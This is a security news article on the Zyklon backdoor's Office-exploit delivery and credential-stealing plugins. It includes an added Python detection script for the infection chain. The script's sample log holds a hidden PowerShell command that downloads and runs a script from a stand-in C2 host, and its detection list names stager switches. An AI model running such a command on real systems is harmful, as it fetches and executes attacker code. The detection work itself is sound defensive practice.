
Zyklon HTTP malware creates gaping backdoors through MS Office exploits

22 Jan 18

Telecommunications, insurance and financial service providers are the latest targets of a multi-feature backdoor called Zyklon, which can carry out a range of attacks, from DDoS to keylogging.

Researchers Swapnil Patil and Yogesh Londhe from FireEye explain that while Zyklon has been in the wild since 2016, the recent wave is being delivered as attachments to spam emails.

Zyklon HTTP malware is described as a publicly available, fully featured backdoor that is able to conduct DDoS attacks, steal passwords, act as a keylogger, update and remove itself, and act as a downloader for additional plugins.

Builds of the malware sell for between $75 and $125 on underground marketplaces.

The latest wave arrives as a .ZIP attachment to a spam email. That archive contains a malicious .DOC file.

“The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over,” the researchers explain.

They go on to say that the PowerShell stage downloads the final payload from the Command & Control server and executes it.

Two of the vulnerabilities FireEye identifies are named in the report. The first, CVE-2017-8759, is a flaw in the .NET Framework's SOAP WSDL parser that lets a malicious document trigger remote code execution when it is opened.

The second, CVE-2017-11882, is a recently disclosed vulnerability in the legacy Equation Editor component (EQNEDT32.EXE) shipped with Microsoft Office 2016, 2013, 2010 and 2007.

Microsoft lists it as a ‘Microsoft Office Memory Corruption Vulnerability’: a stack buffer overflow that lets an attacker run arbitrary code in the context of the current user when a crafted document is opened. Both flaws were patched by Microsoft in 2017 (September and November respectively), so the campaign depends on hosts that have not applied those updates.
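The infection chain described above (a .DOC opened from the spam ZIP, an Office exploit, a PowerShell stager that pulls the final payload) leaves a recognisable parent/child process trail on the endpoint. The following is an added example, not code from FireEye or from the article: it scans Sysmon-style process-creation records (Event ID 1 field names) for an Office host spawning a script interpreter, PowerShell launched with download or evasion switches, and any child of EQNEDT32.EXE, the Equation Editor process that CVE-2017-11882 exploits and which has no legitimate reason to start other processes. The log lines, host paths and the C2 hostname are constructed for this example.

```python
"""Flag the Zyklon infection chain in process-creation telemetry.

Added example, not code from FireEye or from the article. The field
names follow Sysmon Event ID 1; the sample log lines are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# Office applications that open the malicious .DOC from the spam ZIP.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Equation Editor only renders equations; it should never have children.
EQUATION_EDITOR = "eqnedt32.exe"

# Interpreters and living-off-the-land binaries a document dropper spawns.
SCRIPT_HOSTS = {
    "powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

# PowerShell switches and cmdlets typical of download-and-execute stagers.
PS_INDICATORS = ("downloadstring", "downloadfile", "-enc", "-w hidden",
                 "-ep bypass", "executionpolicy bypass", "iex ")

# Key=Value or Key="quoted value" pairs, one record per line.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one record into a field dict, stripping surrounding quotes."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return the name of the rule an event trips, or None if it looks benign."""
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "").lower()

    if parent == EQUATION_EDITOR:
        # Strongest signal: Equation Editor spawning anything at all.
        return "eqnedt32_child"
    if parent in OFFICE_HOSTS and child in SCRIPT_HOSTS:
        return "office_spawns_script_host"
    if child == "powershell.exe" and any(ind in cmdline for ind in PS_INDICATORS):
        return "suspicious_powershell"
    return None


def scan(log: str) -> List[Tuple[str, str, str]]:
    """Return (rule, parent, child) for every record that trips a rule."""
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        rule = classify(event)
        if rule:
            hits.append((rule,
                         image_name(event.get("ParentImage", "")),
                         image_name(event.get("Image", ""))))
    return hits


# Constructed sample telemetry: the user opens invoice.doc from the ZIP,
# Word launches a PowerShell stager, then the Equation Editor exploit
# spawns cmd.exe. The last record is benign and must not match.
SAMPLE_LOG = r'''
EventID=1 Image="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" ParentImage="C:\Windows\explorer.exe" CommandLine="WINWORD.EXE /n C:\Users\alice\Downloads\invoice.doc"
EventID=1 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" CommandLine="powershell -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2.ps1')"
EventID=1 Image="C:\Windows\System32\cmd.exe" ParentImage="C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" CommandLine="cmd /c start %APPDATA%\words.exe"
EventID=1 Image="C:\Windows\System32\notepad.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="notepad.exe"
'''

if __name__ == "__main__":
    for rule, parent, child in scan(SAMPLE_LOG):
        print(f"{rule:28s} {parent} -> {child}")
```

The same three rules map directly onto Sysmon Event ID 1 or Windows Security event 4688 (with command-line auditing enabled) in a SIEM. The EQNEDT32.EXE rule is worth keeping even on patched hosts; Microsoft's advisory for CVE-2017-11882 also describes disabling the Equation Editor COM object through a registry compatibility flag, which removes that attack surface entirely on machines that do not need it.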

Researchers also say that Zyklon uses the Tor network for its Command and Control communication.

Researchers say that Zyklon can download additional plugins, including:

Browser Password Recovery, which can recover passwords from popular web browsers including Google Chrome, Mozilla Firefox, Apple Safari, Internet Explorer, Comodo Dragon Browser, Opera Browser, Chrome Canary/SXS, CoolNovo Browser, Flock Browser, SeaMonkey Browser and SRWare Iron Browser.

FTP Password Recovery, which can steal passwords from FTP applications including FileZilla, Dreamweaver, SmartFTP, FlashFXP, FTPCommander and WS_FTP.

Gaming Software Key Recovery, which steals keys from games including Age of Empires, FIFA, Call of Duty, NFS, The Sims, Quake, Half-Life, IGI and Star Wars.

Email Password Recovery, which can steal passwords from Microsoft Outlook and Microsoft Outlook Express, Mozilla Thunderbird, Windows Live Mail 2012, Incredimail, Foxmail, Windows Live Messenger, MSN Messenger, Windows Credential Manager, Google Talk, Gmail Notifier, PaltalkScene IM, Pidgin Messenger and Miranda Messenger.

Licence Key Recovery, which steals serial keys from popular software including Adobe, Microsoft Office, SQL Server and Nero.

Socks5 Proxy, which can create a reverse Socks5 proxy server.

The Zyklon malware can also hijack the user’s clipboard, replacing a copied Bitcoin address with one supplied by the Zyklon control server so that funds are sent to the attacker instead.
